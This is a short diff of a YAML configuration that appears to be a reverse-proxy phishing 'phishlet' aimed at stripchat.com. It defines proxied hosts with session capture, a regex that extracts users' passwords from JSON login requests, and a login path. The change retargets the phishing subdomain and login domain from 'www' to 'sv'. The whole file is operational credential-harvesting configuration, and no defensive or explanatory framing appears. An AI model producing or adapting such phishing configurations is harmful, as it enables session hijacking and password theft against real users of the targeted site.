--- a/stripchat2.yaml
+++ b/stripchat2.yaml
@@ -1,7 +1,7 @@
 author: '@luffy'
 min_ver: '2.3.0'
 proxy_hosts:
-  - {phish_sub: 'www', orig_sub: 'www', domain: 'stripchat.com', session: true, is_landing: true}
+  - {phish_sub: 'sv', orig_sub: 'sv', domain: 'stripchat.com', session: true, is_landing: true}
  
   - {phish_sub: 'www', orig_sub: 'www', domain: 'stripchat.com', session: true, is_landing: false}
   
@@ -27,7 +27,7 @@ credentials:
     search: '"password":"([^"]*)"'
     type: 'json'
 login:
-  domain: 'www.stripchat.com'
+  domain: 'sv.stripchat.com'
   path: '/login'
 # Handle redirect issue, only login page will have three buttons.
 # Hook Sign In button to redirect after they click it, keep checking for
